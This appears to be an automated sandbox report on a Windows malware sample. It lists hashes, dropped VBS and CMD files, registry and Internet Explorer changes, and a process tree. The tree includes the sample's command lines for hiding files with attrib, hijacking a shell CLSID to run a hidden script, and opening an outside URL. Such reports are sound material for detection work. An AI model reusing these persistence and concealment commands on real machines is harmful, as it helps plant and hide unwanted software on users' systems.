36e1dc46694f82d37df9a900c585e3f97897758ef465fb13f7c0e27e29a52e05

Analysis

max time kernel
138s
max time network
141s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
19-01-2024 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

670e6a162855d24ade316be8742406cc.exe
Size

313KB
MD5

670e6a162855d24ade316be8742406cc
SHA1

50363de25516d14838a5f92f22eb7aacc1b6b6ab
SHA256

36e1dc46694f82d37df9a900c585e3f97897758ef465fb13f7c0e27e29a52e05
SHA512

4562c65b69c66a2d4d76081fc17c3a1fd6000de5bd4825642b873020862d2b18fee3a41e8865a68ce88904a7393d90e55faece3c8e77b904bb1a411aeebb3078
SSDEEP

6144:08U2qy6rRZb7jxGYC5JTR3uaufWG7JbvTsCIq6G7GfwtBhPhb:Szy6rRxEP9ufWG7lhP742Zb

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2000	attrib.exe
1376	attrib.exe
2776	attrib.exe

Executes dropped EXE 5 IoCs

pid	Process
1340	setup.exe
2552	msn.exe
816	ar2.exe
2960	ar2.exe
596	ar2.exe

Loads dropped DLL 5 IoCs

pid	Process
1308	cmd.exe
1308	cmd.exe
2552	msn.exe
2552	msn.exe
2552	msn.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\cpa.cmd	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\se1.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se1.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao.ico	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Windows NT\se.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\file.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\安全工具.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tools.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\tool.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\starts.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\tools.lnk	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\file.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\soft\msn.exe	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\runonce.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\361.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Windows NT\se1.vbs	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\starts.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\安全工具.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\cpa.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\361.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\360.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	attrib.exe
File opened for modification	C:\Program Files\Windows NT\se.vbs	cmd.exe
File opened for modification	C:\Program Files\Kingsoft	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\runonce.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\360.cmd	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	attrib.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao.ico	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\msn.exe	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\setup.exe	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\se.vbs	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\open.vbs	670e6a162855d24ade316be8742406cc.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_259397089	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	670e6a162855d24ade316be8742406cc.exe
File created	C:\Program Files\Windows NT\se1.vbs	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2920	sc.exe
1420	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EABC9421-B69D-11EE-851B-E6629DF8543F} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000969d72c3e5a03a40a0257479feadc03a00000000020000000000106600000001000020000000a511ae0858035a6dfaab93a462b6480d3de138a3220b713fe180967087c76520000000000e80000000020000200000001dea8738d7a6033cb12f60966cb55aef8876fc01cf46fc8b491172ffed1c07be20000000b839a6bb59a6087ba5c2330b367f41eb451abcf83ab419d97999b88906632ac9400000005f32db94d55723c0c9293b2b030a78dd02390a052f021e931d528d0d5489fb943d6e97ef9728babea37220eb79c9db61e5ed24e7e61febb83e6467d7595f6a21	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90b763bfaa4ada01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000969d72c3e5a03a40a0257479feadc03a0000000002000000000010660000000100002000000003b6bc224adf6f78804b30cb5b2d548b080681d53b257cd36ede38bdfc7afa99000000000e800000000200002000000079cbb4fc07a61b93599140989b55ffe5cd0c0d329b046f07a5a7e66845d8c4fc9000000045318cbecb39078f7fbf5e0badc2e92d7e3a0a44b23a9faeaa1eef618c01f5a2be066e5e70df75995c2059d8edbb767484b69bf9b0c6b29d4658d439958093deb0b993489222cc99a227ab4bde54b6a7416af9a3030c018c550103ab26246605139eab947c758d15fb234d242b086ba75e56126cbc95109ae5bf7c317fb80215cc22c68b85ab633be7181d707e028ace400000006c3f11593fe1124487ed8da01c9aa61464b359681180c5255e8becd3e9aa5084986287afd2a7952c1424f95b4523de3272fd7bc6a5545566177143cc97e0384d	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "411811854"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies registry class 44 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2192	iexplore.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
2192	iexplore.exe
2192	iexplore.exe
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE
816	ar2.exe
816	ar2.exe
816	ar2.exe
2960	ar2.exe
2960	ar2.exe
2960	ar2.exe
596	ar2.exe
596	ar2.exe
596	ar2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 2688	2016	670e6a162855d24ade316be8742406cc.exe	28
PID 2016 wrote to memory of 2688	2016	670e6a162855d24ade316be8742406cc.exe	28
PID 2016 wrote to memory of 2688	2016	670e6a162855d24ade316be8742406cc.exe	28
PID 2016 wrote to memory of 2688	2016	670e6a162855d24ade316be8742406cc.exe	28
PID 2688 wrote to memory of 2544	2688	WScript.exe	29
PID 2688 wrote to memory of 2544	2688	WScript.exe	29
PID 2688 wrote to memory of 2544	2688	WScript.exe	29
PID 2688 wrote to memory of 2544	2688	WScript.exe	29
PID 2544 wrote to memory of 2192	2544	cmd.exe	31
PID 2544 wrote to memory of 2192	2544	cmd.exe	31
PID 2544 wrote to memory of 2192	2544	cmd.exe	31
PID 2544 wrote to memory of 2192	2544	cmd.exe	31
PID 2688 wrote to memory of 1760	2688	WScript.exe	32
PID 2688 wrote to memory of 1760	2688	WScript.exe	32
PID 2688 wrote to memory of 1760	2688	WScript.exe	32
PID 2688 wrote to memory of 1760	2688	WScript.exe	32
PID 1760 wrote to memory of 1376	1760	cmd.exe	34
PID 1760 wrote to memory of 1376	1760	cmd.exe	34
PID 1760 wrote to memory of 1376	1760	cmd.exe	34
PID 1760 wrote to memory of 1376	1760	cmd.exe	34
PID 1760 wrote to memory of 2776	1760	cmd.exe	35
PID 1760 wrote to memory of 2776	1760	cmd.exe	35
PID 1760 wrote to memory of 2776	1760	cmd.exe	35
PID 1760 wrote to memory of 2776	1760	cmd.exe	35
PID 2192 wrote to memory of 2852	2192	iexplore.exe	36
PID 2192 wrote to memory of 2852	2192	iexplore.exe	36
PID 2192 wrote to memory of 2852	2192	iexplore.exe	36
PID 2192 wrote to memory of 2852	2192	iexplore.exe	36
PID 1760 wrote to memory of 2000	1760	cmd.exe	37
PID 1760 wrote to memory of 2000	1760	cmd.exe	37
PID 1760 wrote to memory of 2000	1760	cmd.exe	37
PID 1760 wrote to memory of 2000	1760	cmd.exe	37
PID 1760 wrote to memory of 1936	1760	cmd.exe	38
PID 1760 wrote to memory of 1936	1760	cmd.exe	38
PID 1760 wrote to memory of 1936	1760	cmd.exe	38
PID 1760 wrote to memory of 1936	1760	cmd.exe	38
PID 1760 wrote to memory of 1592	1760	cmd.exe	39
PID 1760 wrote to memory of 1592	1760	cmd.exe	39
PID 1760 wrote to memory of 1592	1760	cmd.exe	39
PID 1760 wrote to memory of 1592	1760	cmd.exe	39
PID 1760 wrote to memory of 2008	1760	cmd.exe	40
PID 1760 wrote to memory of 2008	1760	cmd.exe	40
PID 1760 wrote to memory of 2008	1760	cmd.exe	40
PID 1760 wrote to memory of 2008	1760	cmd.exe	40
PID 1760 wrote to memory of 2172	1760	cmd.exe	41
PID 1760 wrote to memory of 2172	1760	cmd.exe	41
PID 1760 wrote to memory of 2172	1760	cmd.exe	41
PID 1760 wrote to memory of 2172	1760	cmd.exe	41
PID 1760 wrote to memory of 2176	1760	cmd.exe	42
PID 1760 wrote to memory of 2176	1760	cmd.exe	42
PID 1760 wrote to memory of 2176	1760	cmd.exe	42
PID 1760 wrote to memory of 2176	1760	cmd.exe	42
PID 1760 wrote to memory of 2004	1760	cmd.exe	43
PID 1760 wrote to memory of 2004	1760	cmd.exe	43
PID 1760 wrote to memory of 2004	1760	cmd.exe	43
PID 1760 wrote to memory of 2004	1760	cmd.exe	43
PID 1760 wrote to memory of 1692	1760	cmd.exe	44
PID 1760 wrote to memory of 1692	1760	cmd.exe	44
PID 1760 wrote to memory of 1692	1760	cmd.exe	44
PID 1760 wrote to memory of 1692	1760	cmd.exe	44
PID 1760 wrote to memory of 816	1760	cmd.exe	45
PID 1760 wrote to memory of 816	1760	cmd.exe	45
PID 1760 wrote to memory of 816	1760	cmd.exe	45
PID 1760 wrote to memory of 816	1760	cmd.exe	45

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1376	attrib.exe
2776	attrib.exe
2000	attrib.exe

C:\Users\Admin\AppData\Local\Temp\670e6a162855d24ade316be8742406cc.exe
"C:\Users\Admin\AppData\Local\Temp\670e6a162855d24ade316be8742406cc.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?downxia
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?downxia
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2192
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\Microsoft\bot.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1376
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\tool.cmd"
      4⤵
      Sets file to hidden
